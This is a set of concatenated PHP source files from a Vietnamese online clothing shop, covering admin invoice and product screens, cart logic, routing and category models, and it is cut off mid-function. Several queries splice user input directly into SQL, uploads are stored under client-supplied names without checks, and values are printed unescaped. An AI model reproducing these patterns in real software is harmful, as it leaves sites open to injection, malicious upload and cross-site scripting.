<input type="text" placeholder="Search By idUser" name="timkiem_hd"> 
<button type="submit"><i class="fa fa-search"></i></button>
<a href="?action=hoadon" style="font-size: 15px;">All</a>
</form>
</div>
<br>
<br>
<table border="3" cellpadding="10" style="font-size: 15px;">
<thead>
<tr>
<th>idhoadon</th>
<th class="theadd">idUser</th>
<th class="theadd">idSP</th>
<th class="theadd">Tổng tiền</th>
<th class="theadd">Ngày mua</th>
<th class="theadd">Số lượng mua</th>
<th class="theadd">Trạng thái</th>
<th>Hành động</th>
</tr>
</thead>
<tbody>
<?php foreach ($data as $value) { ?>
<tr>
<td scope="row"><?= $value['idhoadon'] ?></td>
<td><?= $value['idUser'] ?> </td>
<td><?= $value['idSP'] ?></td>
<td><?= $value['tongtien'] ?>.000 VND</td>
<td><?= $value['ngaymua']?></td>
<td><?= $value['soluongmua'] ?></td>
<td>
<?php if($value['trangthai'] == 0){
echo "Chưa Xét duyệt";
}else{
echo "Đã duyệt";
} ?>
</td>
<td>
                        <!-- note the "=" separators in the href query string -->
<a href="?action=xemhoadon&id=<?= $value['idhoadon'] ?>&idSP=<?= $value['idSP'] ?>&idUser=<?= $value['idUser'] ?>" type="button" class="btn btn-light">Chi tiết</a>
<?php if($_SESSION['admin'] == true){ ?>
<?php if($value['trangthai'] == 0){ ?>
<a href="?action=duyethoadon&id=<?= $value['idhoadon'] ?>&idSP=<?= $value['idSP'] ?>&soluongmua=<?php echo $value['soluongmua'] ?>" type="button" class="btn btn-primary">Duyệt hóa đơn</a>
<?php }else{} ?>
<a href="?action=xoahoadon&id=<?= $value['idhoadon'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa">
<i class="fa fa-times"></i></a>
<?php }else{} ?>
</td>
</tr>
<?php } ?>
</tbody>
</table>
<br>
<br>
<br>
</div>
</div>
<file_sep>/admin/views_admin/sanpham/sua.php
<div id="viewport">
<div class="container-fluid" id="noidung">
<h4>Database sanpham</h4>
<div style="background-color: #e5e5e5; padding: 10px 50px 10px; color:gray;">
<form action="?action=suasanpham_xl" method="post" enctype="multipart/form-data" > <!-- model_admin/sua_xl.php -->
<table border="0" cellpadding="10">
<input type="hidden" value="<?php echo $data['idSP'];?>" name="idSP">
<tr>
<td>idLoaiSP:</td>
<td>
<select name="idLoaiSP">
<?php foreach ($data_lsp as $value) {?>
<?php echo "<option value='".$value['idLoaiSP']."'>".$value['tenLSP']."</option>"; ?>
<?php } ?>
</select>
</td>
</tr>
<tr>
<td>Loại Khuyến mãi:</td>
<td>
<select name="idKM">
<?php foreach ($data_km as $value) {?>
<?php echo "<option value='".$value['idKM']."'>".$value['loaiKM']."</option>"; ?>
<?php } ?>
</select>
</td>
</tr>
<tr>
<td>id màu:</td>
<td>
<select name="idmau">
<?php foreach ($data_mau as $value) {?>
<?php echo "<option value='".$value['idcolor']."'>".$value['color']."</option>"; ?>
<?php } ?>
</select>
</td>
</tr>
<tr>
<td>id size:</td>
<td>
<select name="idsize">
<?php foreach ($data_size as $value) {?>
<?php echo "<option value='".$value['idsize']."'>".$value['size']."</option>"; ?>
<?php } ?>
</select>
</td>
</tr>
<tr>
<td>Tên Sản Phẩm:</td>
<td><input type="text" name="tenSP" value="<?php echo $data['tenSP'];?>" required></td>
</tr>
<tr>
<td>Đơn giá:</td>
<td><input type="text" value="<?php echo $data['Dongia'];?>" name="Dongia" required> .000 VND</td>
</tr>
<tr>
<td>ảnh 1:</td>
<td><input type="file" value="<?php echo $data['anh1'];?>" name="anh1"></td>
</tr>
<tr>
<td>ảnh 2:</td>
<td><input type="file" name="anh2"></td>
</tr>
<tr>
<td>ảnh 3:</td>
<td><input type="file" name="anh3"></td></td>
</tr>
<tr>
<td>Ngày nhập:</td>
<td><input type="date" value="<?php echo $data['ngaynhap'];?>" name="ngaynhap" required></td>
</tr>
<tr>
<td>Số lượng:</td>
<td><input type="text" value="<?php echo $data['soluong'];?>" name="soluong" required></td>
</tr>
<tr>
<td>mô tả:</td>
<td style="width: 150%;">
<form action="_posteddata.php" method="post">
<textarea name="mota" value="<?php echo $data['mota'];?>" cols="" rows="" required></textarea>
<!-- <input name="ok" type="submit" value="Ok" /> -->
</form>
</td>
</tr>
<tr>
<td colspan="2"><button style="width: 100px; background-color: darkgray;" type="submit">Sửa</button></td>
</tr>
</table>
</form>
<br>
<br>
<br>
</div>
</div>
</div>
<script type="text/javascript" >
CKEDITOR.replace( 'mota' );
</script><file_sep>/admin/model_admin/loaisanpham.php
<?php
// MODEL FOR PRODUCT-CATEGORY DATA
require_once('ketnoi.php');
/**
*
*/
class loaisanpham
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
function allCate()
{
$query = "SELECT * FROM loaisanpham";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function all()
{
$query = "SELECT * FROM loaisanpham ORDER BY idLoaiSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function timkiem_lsp($timkiem_lsp)
{
$query = "SELECT * FROM loaisanpham WHERE tenLSP LIKE '%$timkiem_lsp%' ORDER BY idLoaiSP";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
function find($id)
{
$query = "SELECT * FROM loaisanpham WHERE idLoaiSP=$id";
return $this->conn->query($query)->fetch_assoc();
}
function update($idLoaiSP, $tenLSP)
{
$query="UPDATE loaisanpham SET tenLSP='$tenLSP'WHERE idLoaiSP='$idLoaiSP' ";
$result = $this->conn->query($query);
if($result == true){
header('Location: ?action=loaisanpham');
}
}
function insert($tenLSP)
{
$query= "INSERT INTO loaisanpham (tenLSP)
VALUES ('$tenLSP') ";
$result = $this->conn->query($query);
if($result == true){
header('location: ?action=loaisanpham');
}
else{
header('location: ?action=themloaisanpham_giaodien');
}
}
    function delete($id) // work in progress
{
$query = "DELETE FROM loaisanpham WHERE idLoaiSP='$id' ";
$result = $this->conn->query($query);
if($result == true){
echo "<script> ";
echo "location.href='?action=loaisanpham';</script>";
}else{
echo "<script> ";
echo "location.href='?action=loaisanpham';</script>";
}
}
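    // Hedged sketch of timkiem_lsp() with a bound parameter; the LIKE
    // wildcards are added in PHP so user input is never concatenated into
    // the SQL string. Not referenced by the controller yet.
    function timkiem_lsp_antoan($tukhoa)
    {
        $stmt = $this->conn->prepare(
            "SELECT * FROM loaisanpham WHERE tenLSP LIKE ? ORDER BY idLoaiSP");
        $mau = '%' . $tukhoa . '%';
        $stmt->bind_param('s', $mau);
        $stmt->execute();
        $result = $stmt->get_result();
        $data = array();
        while ($row = $result->fetch_assoc()) {
            $data[] = $row;
        }
        return $data;
    }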
}
?><file_sep>/controller/giohang_controller.php
<?php
require_once('./model/giohang.php');
/**
*
*/
class giohang_controller
{
var $giohang_controller;
function __construct()
{
$this->giohang_controller = new giohang();
}
public function list_giohang() // okie
{
$data_loaisanpham = $this->giohang_controller->loaisanpham();
        // everything from here down in this method is unused
$data_chitietSP = array();
for($i=0 ; $i<count($data_loaisanpham); $i++){
$data_chitietSP[$i] = $this->giohang_controller->chitiet_sp($i);
}
        // not needed yet; counts the total quantity of items in the cart
$count = 0;
if (isset($_SESSION['sanpham'])) {
foreach ($_SESSION['sanpham'] as $value) {
$count += $value['soluong'];
}
}
require_once('views/index.php');
}
function add_giohang() // okie
{
$id = $_GET['id'];
$data = $this->giohang_controller->chitiet_sp($id);
$count = 0;
if (isset($_SESSION['sanpham'][$id])) {
$arr = $_SESSION['sanpham'][$id];
$arr['soluong'] = $arr['soluong'] + 1;
$arr['soluong_kho'] = $data['soluong'] - 1;//
$arr['thanhtien'] = $arr['soluong'] * $arr["Dongia"];
$_SESSION['sanpham'][$id] = $arr;
} else {
$arr['idSP'] = $data['idSP'];
$arr['tenSP'] = $data['tenSP'];
$arr['Dongia'] = $data['Dongia'];
$arr['soluong'] = 1;
$arr['soluong_kho'] = $data['soluong']-1;//
$arr['thanhtien'] = $data['Dongia'];
$arr['anh1'] = $data['anh1'];
$_SESSION['sanpham'][$id] = $arr;
}
foreach ($_SESSION['sanpham'] as $value) {
$count += $value['thanhtien'];
}
header('Location:?action=giohang&act=list_giohang');
}
function update_giohang()
{
$arr = $_SESSION['sanpham'][$_GET['id']];
if($arr['soluong_kho'] <= 0 ){
$arr['soluong'] = $arr['soluong'];
$arr['soluong_kho'] = $arr['soluong_kho'];
}else{
$arr['soluong'] = $arr['soluong'] + 1;
$arr['soluong_kho'] = $arr['soluong_kho'] - 1;//
}
$arr['thanhtien'] = $arr['soluong'] * $arr["Dongia"];
$_SESSION['sanpham'][$_GET['id']] = $arr;
header('Location:?action=giohang&act=list_giohang');
}
function update_giohang_tru()
{
$arr = $_SESSION['sanpham'][$_GET['id']];
$arr['soluong'] = $arr['soluong'] - 1;
$arr['soluong_kho'] = $arr['soluong_kho'] + 1;//
$arr['thanhtien'] = $arr['soluong'] * $arr["Dongia"];
        $_SESSION['sanpham'][$_GET['id']] = $arr;
        // remove the row entirely once its quantity reaches zero,
        // and only redirect after the session has been updated
        if ($arr['soluong'] <= 0) {
            unset($_SESSION['sanpham'][$_GET['id']]);
        }
        header('Location:?action=giohang&act=list_giohang');
    }
    /// Remove an item from the cart
function delete_cart() //okie
{
$id = $_GET['id'];
$arr = $_SESSION['sanpham'][$id];
if ($arr['soluong'] == 1) {
unset($_SESSION['sanpham'][$_GET['id']]);
} else {
$arr = $_SESSION['sanpham'][$_GET['id']];
$arr['soluong'] = $arr['soluong'] - 1;
$arr['thanhtien'] = $arr['soluong'] * $arr["Dongia"];
$_SESSION['sanpham'][$_GET['id']] = $arr;
}
header('Location: ?action=giohang&act=list_giohang');
}
function deleteall_cart() // okie
{
unset($_SESSION['sanpham']);
        unset($_SESSION['thanhtien']); // also clear the cached subtotal
        unset($_SESSION['tongtien']); // also clear the cached grand total
header('Location: ?action=giohang&act=list_giohang');
}
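    // Hedged helper, not referenced by the views yet: recomputes the cart
    // counters from $_SESSION['sanpham'] in one place instead of repeating
    // the summing loops inside each action above.
    function tong_giohang()
    {
        $tong = array('soluong' => 0, 'thanhtien' => 0);
        if (isset($_SESSION['sanpham'])) {
            foreach ($_SESSION['sanpham'] as $sp) {
                $tong['soluong'] += $sp['soluong'];
                $tong['thanhtien'] += $sp['thanhtien'];
            }
        }
        return $tong;
    }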
}
?><file_sep>/views/header/header.php
<div class="header-middle"><!--header-middle-->
<div class="row row_header">
<div class="col-sm-6" style="color: gray;">
<div class="dropdown" style="float:left;">
<button class="dropbtnn">Dịch Vụ Khách Hàng
<i class="fa fa-caret-down"></i>
</button>
<div class="dropdown-content" style="left:0;">
<a href="?action=gioithieu">Giới thiệu cửa hàng</a>
<a href="#lienhe">Thông tin liên hệ</a>
<a href="#">Gửi phản hồi</a>
</div>
</div>
<span class="kedoc">|</span>
Open: <?php echo $_SESSION['time'] ?>   Mail: <?php echo $_SESSION['mail_1'] ?>  Phone:(+84) <?php echo $_SESSION['phone_1'] ?>
</div>
<div class="col-sm-6">
<div class="shop-menu pull-right">
<ul class="nav navbar-nav">
<!-- đăng ký -->
<li>
<div class="dropdown221">
<?php if(!isset($_SESSION['tendangnhap'])){ ?>
<i class="fa fa-plus img_user" title="Tài Khoản">
<a href="?action=dangnhap" class="dangkya">Đăng ký </a></i>
<?php }else{
} ?>
</div>
</li>
<!-- đăng nhập -->
<li>
<div class="dropdown22">
<i class="fa fa-user img_user" title="Tài Khoản">
<?php if(isset($_SESSION['tendangnhap'])){
echo 'Chào '.$_SESSION['tendangnhap'];
}else{
echo ' Đăng nhập';
}
?>
</i>
<div class="dropdown-content22">
<!-- <a class="aacount" href="#"><center><span>Đăng nhập</span></center></a>-->
<ul>
<?php if(isset($_SESSION['tendangnhap'])){ ?>
<li></li>
<li><a class="aacount" style="margin-left: -40px;" href="?action=taikhoan&ten=<?php echo $_SESSION['tendangnhap']; ?>"><span>Tài khoản</span></a></li><br>
<li><a class="aacount" href="?action=dangxuat" onclick="TBdangxuat()"><span>Đăng xuất</span></a></li>
<?php if($_SESSION['admin'] == true || $_SESSION['banhang'] == true){ ?>
<li>
<a class="aacount" href="admin/index.php?action=trangchu"><span>Trang quản lý</span></a>
</li>
<?php }}else{ ?>
<li><center><b class="hd_kh">Khách hàng<br><br></b></center></li>
<li><a class="aacount" href="?action=dangnhap"><span>Đăng nhập</span></a></li>
<?php } ?>
</ul>
</div>
</div>
</li>
</ul>
</div>
</div>
</div>
</div>
<div class="header-bottom"><!--header-bottom-->
<div class="container">
<div class="row">
<div class="col-sm-9">
<div class="mainmenuu pull-left">
<ul class="nav navbar-nav collapse navbar-collapse">
<li><a href="?action=trangchu" class="active">
<div class="btn-group">
<img src="public/image/logo.png" alt="logo" title="về trang chủ">
</div>
</a></li>
<li class="dropdown"><a href="?action=cuahang1">Cửa Hàng</a></li>
                        <!-- each link passes the product-category id -->
<?php foreach ($data_loaisanpham as $value) { ?>
<li class="dropdown"><a href="?action=cuahang&id=<?= $value['idLoaiSP'] ?>" style="font-size: 15px;"><?= $value['tenLSP'] ?></a></li>
<?php } ?>
</ul>
</div>
</div>
<form method="POST" action="?action=cuahang1">
<div class="col-sm-3">
<div class="search_box pull-right">
<input type="text" placeholder="Search By Name" name="timkiem_sp"> 
<button type="submit"><i class="fa fa-search"></i></button>
<a id="a1" href="?action=giohang&?act=list_giohang"> <i class="fa fa-shopping-cart" title="Giỏ Hàng Của Bạn"></i> </a>
</div>
</div>
</form>
</div>
</div>
</div>
<!-- end header bottom -->
<!-- /header -->
<script>
function TBdangxuat() {
alert("Bạn muốn đăng xuất?");
}
</script><file_sep>/admin/views_admin/hoadon/quanlyhoadon.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-heading">Danh sách hóa đơn</div>
<div class="panel-body">
<table class="table table-bordered table-hover " style="text-align:center;">
<tr>
<th style="text-align:center;">STT</th>
<th style="text-align:center;">ID hóa đơn</th>
<th style="text-align:center;">Tên Khách Hàng</th>
<th style="text-align:center;">Tên sản phẩm</th>
<th style="text-align:center;">Tổng tiền</th>
<th style="text-align:center;">Ngày mua</th>
<th style="text-align:center;">Số lượng mua</th>
<th style="text-align:center;">Trạng thái</th>
<th style="text-align:center;">Hành động</th>
</tr>
<?php
$stt = 1;
foreach ($data as $value) : ?>
<tr>
<td><?= $stt++ ?></td>
<td><?= $value['idhoadon'] ?></td>
<?php
foreach ($user as $row) :
if ($value['idUser'] == $row['idUser']) {
?>
<td><?= $row['ho'] . " " . $row['ten']; ?></td>
<?php }
endforeach ?>
<?php
foreach ($sanpham as $row) :
if ($value['idSP'] == $row['idSP']) {
?>
<td><?=$row['tenSP'] ?></td>
<?php }
endforeach ?>
<td><?= number_format($value['tongtien']) ?> VND</td>
<td><?= $value['ngaymua'] ?></td>
<td><?= $value['soluongmua'] ?></td>
<td>
<?php if ($value['trangthai'] == 0) {
echo "Chưa Xét duyệt";
} else {
echo "Đã duyệt";
} ?>
</td>
<td>
                        <!-- note the "=" separators in the href query string -->
<?php if ($_SESSION['admin'] == true) { ?>
<?php if ($value['trangthai'] == 0) { ?>
<a href="?action=duyethoadon&id=<?= $value['idhoadon'] ?>&idSP=<?= $value['idSP'] ?>&soluongmua=<?php echo $value['soluongmua'] ?>" type="button" class="btn btn-primary">Duyệt hóa đơn</a>
<?php } else {
} ?>
<a href="?action=xoahoadon&id=<?= $value['idhoadon'] ?>" onclick="return confirm('Bạn có thật sự muốn xóa ?');" type="button" class="btn btn-danger" title="Xóa">
<i class="fa fa-times"></i></a>
<?php } else {
} ?>
</td>
</tr>
<?php
endforeach;
?>
</table>
<style type="text/css">
.pagination {
padding: 0px;
margin: 0px;
}
</style>
</div>
</div>
</div>
<!-- end content -->
</div><file_sep>/model/danhmuc.php
<?php
require_once('ketnoi.php');
/**
*
*/
class danhmuc
{
var $conn;
function __construct()
{
$connect_obj = new ketnoi();
$this->conn = $connect_obj->connect;
}
    function loaisanpham() // work in progress
{
$query = "SELECT * from loaisanpham limit 0,4";
$result = $this->conn->query($query);
$data = array();
while ($row = $result->fetch_assoc()) {
$data[] = $row;
}
return $data;
}
}
?><file_sep>/admin/views_admin/trangchu/trangchu.php
<div class="col-md-12">
<div class="panel panel-primary">
<div class="panel-body">
<h1><NAME></h1>
<form action="?action=trangchu" method="POST">
<input type="date" name="ngay_gui">
<input type="submit" value="Gửi">
</form>
<br>
<div class="col-sm-4">
<div class="div1">
Doanh thu <?php echo $loai_ngay; ?><br>
- Có <?php $dem1 = 0;
$tongthu1 = 0;
foreach ($thongke_hoadon_ngay as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1; ?></span> hóa đơn<br>
- Tổng thu<span style="color: orange"> <?php echo $tongthu1 . '.000 VND'; ?> </span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
Doanh thu Tháng <?php echo $loai_thang; ?><br>
- Có <?php $dem1 = 0;
$tongthu1 = 0;
foreach ($thongke_hoadon_thang as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1; ?></span> hóa đơn<br>
- Tổng thu <span style="color: orange"><?php echo $tongthu1 . '.000 VND'; ?></span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
Doanh thu Năm <?php echo $loai_nam; ?><br>
- Có <?php $dem1 = 0;
$tongthu1 = 0;
foreach ($thongke_hoadon_nam as $key => $value) {
$dem1++;
$tongthu1 += $value['tongtien'];
} ?>
<span style="color: orange"><?php echo $dem1; ?></span> hóa đơn<br>
- Tổng thu <span style="color: orange"><?php echo $tongthu1 . '.000 VND'; ?></span>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_user = 0;
foreach ($data_user as $value) {
$sum_user += 1;
}
echo "Tổng tài khoản là: " . "<br><span style='color:orange;'> $sum_user</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_sanpham = 0;
foreach ($data_sanpham as $value) {
$sum_sanpham += 1;
}
echo "Tổng sản phẩm là: " . "<br><span style='color:orange;'>$sum_sanpham</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_loaisanpham = 0;
foreach ($data_loaisanpham as $value) {
$sum_loaisanpham += 1;
}
echo "Tổng Loại sản phẩm là: " . "<br><span style='color:orange;'>$sum_loaisanpham</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_hoadon = 0;
foreach ($data_hoadon as $value) {
$sum_hoadon += 1;
}
echo "Tổng hóa đơn là: " . "<br><span style='color:orange;'>$sum_hoadon</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_banner = 0;
foreach ($data_banner as $value) {
$sum_banner += 1;
}
echo "Tổng banner là: " . "<br><span style='color:orange;'>$sum_banner</span>";
?>
</div>
</div>
<div class="col-sm-4">
<div class="div1">
<?php
$sum_khuyenmai = 0;
foreach ($data_khuyenmai as $value) {
$sum_khuyenmai += 1;
}
echo "Tổng các khuyến mãi là: " . "<br><span style='color:orange;'>$sum_khuyenmai</span>";
?>
</div>
</div>
</div>
</div>
<?php if ($_SESSION['admin'] == true) { ?>
<div class="col-sm-12">
<!-- <a href="?action=xoalayout" class="pull-right">Reset data layout</a> -->
<button onclick="myFunction()"><a href="#sualayout">Chỉnh sửa thông tin cửa hàng</a></button>
<p><br><br></p>
</div>
<?php } else {
} ?>
<div id="myDIV" hidden>
<div class="col-md-12">
<div class="panel panel-primary">
<div class="container">
<div class="col-sm-12" style="background-color: lightgray;">
<div class="panel-body">
<form method="POST" action="?action=sualayout" enctype="multipart/form-data">
<h3 style="margin: 30px;"><span id="sualayout">Footer</span></h3>
<?php
foreach ($data_layout as $value) { ?>
<!-- rows -->
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Gmail</div>
<div class="col-md-10">
<input style="margin-left:30px" name="mail" size="70" type="text" value="<?php echo $value['mail'] ?>" required>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"> Địa chỉ</div>
<div class="col-md-10">
<input style="margin-left:30px" name="diachi" size="70" type="text" value="<?php echo $value['diachi'] ?>" required>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2">Số điện thọai</div>
<div class="col-md-10">
+84 <input name="phone" size="70" type="text" value="<?php echo $value['phone'] ?>" required>
</div>
</div>
<div class="row" style="margin-top:25px;">
<div class="col-md-2"></div>
<div class="col-md-10">
<button type="submit" name="create" class="btn btn-primary">Thêm</button>
</div>
</div>
<!-- end rows -->
</form>
</div>
<?php } ?>
</div>
</div>
</div>
</div>
</div>
</div>
<!-- </div> -->
<script>
function myFunction() {
var x = document.getElementById("myDIV");
if (x.style.display === "block") {
x.style.display = "none";
} else {
x.style.display = "block";
}
}
</script><file_sep>/admin/views_admin/dieuhuong.php
<?php
$action = isset($_GET['action']) ? $_GET['action'] : "trangchu"; // $_GET[''] reads the requested action from the query string
switch ($action) {
case 'trangchu':
require_once('trangchu/trangchu.php');
break;
case 'taikhoan':
require_once('taikhoan/Quanlytaikhoan.php');
break;
case 'loaisanpham':
require_once('loaisanpham/quanlyloaisanpham.php');
break;
// case 'danhmuc':
// require_once('danhmuc/quanlydanhmuc.php');
// break;
    // user table: screens for managing user accounts
case 'xemnguoidung':
require_once('taikhoan/xem.php');
break;
case 'edit':
require_once('taikhoan/sua.php');
break;
case 'them_giaodien':
require_once('taikhoan/them.php');
break;
    // sanpham table: screens for products and product categories
case 'sanpham':
require_once('sanpham/quanlysanpham.php');
break;
case 'xemsanpham':
require_once('sanpham/xem.php');
break;
case 'suasanpham':
require_once('sanpham/sua.php');
break;
case 'them_sanpham_giaodien':
require_once('sanpham/them.php');
break;
case 'them_soluong_giaodien':
require_once('sanpham/them_soluong.php');
break;
    // product categories (the 'loaisanpham' case is already handled above)
case 'xemloaisanpham':
require_once('loaisanpham/xem.php');
break;
case 'sualoaisanpham':
require_once('loaisanpham/sua.php');
break;
case 'themloaisanpham_giaodien':
require_once('loaisanpham/them.php');
break;
    // invoices
case 'hoadon':
require_once('hoadon/quanlyhoadon.php');
break;
case 'xemhoadon':
require_once('hoadon/xem.php');
break;
//banner
case 'banner':
require_once('banner/quanlybanner.php');
break;
case 'suabanner':
require_once('banner/sua.php');
break;
case 'thembanner_giaodien':
require_once('banner/them.php');
break;
    // promotions
case 'khuyenmai':
require_once('khuyenmai/quanlykhuyenmai.php');
break;
case 'suakhuyenmai_giaodien':
require_once('khuyenmai/sua.php');
break;
case 'themkhuyenmai_giaodien':
require_once('khuyenmai/them.php');
break;
case 'xemkhuyenmai':
require_once('khuyenmai/xem.php');
break;
default:
require_once('trangchu/trangchu.php');
break;
}
?><file_sep>/controller/chitietmathang_controller.php
<?php
// require_once('views/index.php'); gọi câu mới xuất hiện giao diện được
require_once('./model/hang.php');
/**
*
*/
class chitietmathang
{
var $chitietmathang_controller;
function __construct()
{
$this->chitietmathang_controller = new mathang();
}
public function chitiet_hang()
{
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$data_chitiet = $this->chitietmathang_controller->details_hang($id);
$data_loaisanpham = $this->chitietmathang_controller->loaisanpham();
$ten_color = $this->chitietmathang_controller->getcolor($id);
$size = $this->chitietmathang_controller->getsize($id);
$idLoaiSP = isset($_GET['idLoaiSP']) ? $_GET['idLoaiSP'] : '1';
$data_sanphamlienquan = $this->chitietmathang_controller->sanphamlienquan($idLoaiSP);
$ten_loaisanpham = $this->chitietmathang_controller->layten_loaisanpham($idLoaiSP);
$xem_gopy = $this->chitietmathang_controller->xem_gopy();
require_once('views/index.php');
}
public function gopy()
{
$idSP = $_GET['id'];
$email = filter_input(INPUT_POST, 'email_gopy');
$noidung = filter_input(INPUT_POST, 'noidung_gopy');
$this->chitietmathang_controller->them_gopy($idSP, $email, $noidung);
echo "<script language='javascript'>location.href='?action=chitietmathang&id=".$idSP."';</script>";
}
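    // Hedged helper mirroring the price math repeated in the views
    // (Dongia minus giatriKM percent); not called anywhere yet.
    function gia_sau_khuyenmai($dongia, $giatrikm)
    {
        if ($giatrikm <= 0) {
            return $dongia; // no promotion applied
        }
        return $dongia - ($dongia * $giatrikm / 100);
    }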
}
?><file_sep>/views/dieuhuong.php
<?php
$action = isset($_GET['action']) ? $_GET['action'] : "trangchu"; // $_GET[''] reads the requested action from the query string
switch ($action) {
case 'trangchu':
require_once('home/home.php');
break;
case 'cuahang':
require_once('cuahang/cuahang.php');
break;
case 'cuahang1':
require_once('cuahang/cuahang.php');
break;
    // account section
case 'taikhoan':
require_once('taikhoannguoidung/taikhoannguoidung.php');
break;
    // shop section
case 'luachon':
require_once('cuahang/cuahang.php');
break;
case 'gioithieu':
require_once('gioithieu/gioithieu.php');
break;
case 'dangnhap':
require_once('dangnhap/dangnhap.php');
break;
case 'dangky':
require_once('dangnhap/dangky.php');
break;
case 'giohang':
require_once('giohang/giohang.php');
# code...
break;
case 'chitietmathang':
require_once('chitietmathang/chitietmathang.php');
require_once('sanphamlienquan/sanphamlienquan.php');
# code...
break;
case 'quenmatkhau':
require_once('dangnhap/quenmk.php');
# code...
break;
case 'laymatkhau_submit':
require_once('dangnhap/quenmk.php');
# code...
break;
case 'thanhtoan':
require_once('thanhtoan/thanhtoan.php');
# code...
break;
case 'hoanthanhdonhang':
require_once('hoanthanhdonhang/hoanthanhdonhang.php');
# code...
break;
    default:
        require_once('home/home.php'); // fall back to the home page for unknown actions
        break;
}
<file_sep>/admin/controller_admin/quanlysanpham.php
<?php
// CONTROLLER THAT CALLS THE FUNCTIONS IN THE MODEL
require_once('./model_admin/sanpham.php'); // model is now loaded
require_once('./model_admin/loaisanpham.php');
/**
*
*/
class sanphamcontroller
{
var $sanpham_model;
var $loaisanpham_model;
public function __construct()
{
$this->sanpham_model = new sanpham();
$this->loaisanpham_model = new loaisanpham();
}
    public function list() // lists every product in the database
{
$gioihan = 2;
$trang = isset($_GET['trang'])? $_GET['trang'] : '1';
$batdau = ($trang-1) * $gioihan;
$sodong = mysqli_num_rows($this->sanpham_model->phantrang());
        $tongsotrang = ceil($sodong / $gioihan); // round up so a partial last page is still reachable
$dataCate = $this->loaisanpham_model->allCate();
if(isset($_POST['timkiem_sp'])){
$timkiem_sp = $_POST['timkiem_sp'];
$data = $this->sanpham_model->timkiem_sp($timkiem_sp, $batdau, $gioihan);
}else{
$data = $this->sanpham_model->all($batdau, $gioihan);
}
require_once('views_admin/index.php');
}
function them_giaodien()
{
$data_km = $this->sanpham_model->khuyenmai();
$data_mau = $this->sanpham_model->mau();
$data_size = $this->sanpham_model->size();
$data_lsp = $this->sanpham_model->loaisp();
$dataCate = $this->loaisanpham_model->allCate();
require_once('views_admin/index.php');
}
    public function details() // shows the details of the product selected by $id
{
$data_km = $this->sanpham_model->khuyenmai();
$data_mau = $this->sanpham_model->mau();
$data_size = $this->sanpham_model->size();
$data_lsp = $this->sanpham_model->loaisp();
$id = isset($_GET['id']) ? $_GET['id'] : '1';
$data = $this->sanpham_model->find($id);
require_once('views_admin/index.php');
}
public function update()
{
$idSP = filter_input(INPUT_POST, 'idSP');
$idKM = filter_input(INPUT_POST, 'idKM');
$idLoaiSP = filter_input(INPUT_POST, 'idLoaiSP');
$idcolor = filter_input(INPUT_POST, 'idmau');
$idsize = filter_input(INPUT_POST, 'idsize');
$tenSP = filter_input(INPUT_POST, 'tenSP');
$Dongia =filter_input(INPUT_POST, 'Dongia');
$anh1 = $_FILES['anh1']['name'];
$anh1_tmp = $_FILES['anh1']['tmp_name'];
move_uploaded_file($anh1_tmp, './public_admin/image/sanpham/'.$anh1);
$anh2 = $_FILES['anh2']['name'];
$anh2_tmp = $_FILES['anh2']['tmp_name'];
move_uploaded_file($anh2_tmp, './public_admin/image/sanpham/'.$anh2);
$anh3 = $_FILES['anh3']['name'];
$anh3_tmp = $_FILES['anh3']['tmp_name'];
move_uploaded_file($anh3_tmp, './public_admin/image/sanpham/'.$anh3);
$ngaynhap =filter_input(INPUT_POST, 'ngaynhap');
$mota =filter_input(INPUT_POST, 'mota');
$soluong =filter_input(INPUT_POST, 'soluong');
$this->sanpham_model->update($idSP, $idKM, $idLoaiSP, $idcolor, $idsize, $tenSP, $Dongia, $anh1, $anh2, $anh3, $ngaynhap, $mota, $soluong);
}
public function them()
{
$idLoaiSP =filter_input(INPUT_POST, 'idLoaiSP');
$idKM =filter_input(INPUT_POST, 'idKM');
$idcolor =filter_input(INPUT_POST, 'idmau');
$idsize =filter_input(INPUT_POST, 'idsize');
$tenSP = filter_input(INPUT_POST, 'tenSP');
$Dongia =filter_input(INPUT_POST, 'Dongia');
        // grab the uploaded images
$anh1 = $_FILES['anh1']['name'];
$anh1_tmp = $_FILES['anh1']['tmp_name'];
move_uploaded_file($anh1_tmp, './public_admin/image/sanpham/'.$anh1);
$anh2 = $_FILES['anh2']['name'];
$anh2_tmp = $_FILES['anh2']['tmp_name'];
move_uploaded_file($anh2_tmp, './public_admin/image/sanpham/'.$anh2);
$anh3 = $_FILES['anh3']['name'];
$anh3_tmp = $_FILES['anh3']['tmp_name'];
move_uploaded_file($anh3_tmp, './public_admin/image/sanpham/'.$anh3);
$ngaynhap =filter_input(INPUT_POST, 'ngaynhap');
$mota =filter_input(INPUT_POST, 'mota');
$soluong =filter_input(INPUT_POST, 'soluong');
        // if name, color, size and price match an existing product, add to its quantity instead of inserting a new row
$datasanpham_all = $this->sanpham_model->all_them();
$soluong_them = 0;
foreach ($datasanpham_all as $key => $value) {
if($value['idsize'] == $idsize && $value['idcolor'] == $idcolor && $value['Dongia'] == $Dongia && $value['tenSP'] == $tenSP){
$idSP=$value['idSP'];
